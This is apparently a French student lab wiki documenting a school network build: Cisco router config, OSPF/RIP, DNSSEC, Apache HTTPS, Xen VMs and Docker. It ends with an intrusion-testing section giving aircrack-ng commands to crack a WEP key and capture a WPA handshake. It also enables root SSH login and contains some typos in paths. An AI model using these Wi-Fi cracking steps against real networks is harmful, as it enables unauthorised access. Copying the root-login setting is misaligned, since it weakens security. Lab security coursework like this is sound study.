   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
